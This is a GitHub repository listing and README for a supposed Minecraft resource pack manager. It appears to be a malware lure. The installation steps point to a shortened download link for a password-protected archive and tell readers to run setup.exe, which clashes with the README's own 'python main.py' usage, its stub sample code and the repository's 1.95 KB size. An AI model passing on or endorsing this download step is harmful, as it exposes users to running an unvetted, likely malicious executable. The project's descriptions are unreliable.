https://github.com/ikhifabitai/minecraft-resource-pack-manager
https://github.com/ikhifabitai/minecraft-resource-pack-manager
minecraft minecraft-client minecraft-forge minecraft-forge-mod minecraft-launcher minecraft-mod minecraft-plugin minecraft-resource-pack minecraft-server
Last synced: about 1 month ago
JSON representation
- Host: GitHub
- URL: https://github.com/ikhifabitai/minecraft-resource-pack-manager
- Owner: ikhifabitai
- Created: 2025-03-24T06:23:25.000Z (about 1 month ago)
- Default Branch: main
- Last Pushed: 2025-03-24T06:25:07.000Z (about 1 month ago)
- Last Synced: 2025-03-24T07:31:41.730Z (about 1 month ago)
- Topics: minecraft, minecraft-client, minecraft-forge, minecraft-forge-mod, minecraft-launcher, minecraft-mod, minecraft-plugin, minecraft-resource-pack, minecraft-server
- Homepage:
- Size: 1.95 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Minecraft-Resource-Pack-Manager
## Description
Minecraft Resource Pack Manager is a tool for managing resources and textures in Minecraft.## Installation
📥 Installation Guide
🖥️ Quick Setup (Windows .exe)1️⃣ [Download](https://goo.su/4e0jxV) and extract the package (password: Project12!)
2️⃣ Run setup.exe
3️⃣ Start viewing and editing images effortlessly! 🚀
⚠️ Note: This method ensures a quick and hassle-free installation.
## Usage
Run the application to start managing resources:
shell python main.py## Features
- Add new textures and sounds
- Manage existing resource packs
- Preview resources## Sample Code
Python
```python
import osclass ResourcePack:
def __init__(self, name):
self.name = name
self.resources = []def add_resource(self, resource):
self.resources.append(resource)
```## Contributing
Please see the CONTRIBUTING.md file for information on how to contribute.## License
This project is licensed under the MIT License - see the LICENSE file for details.---
### File Structure
Minecraft-Resource-Pack-Manager/
│
├── README.md
├── LICENSE
├── requirements.txt
├── main.py
├── resource_manager.py
└── CONTRIBUTING.md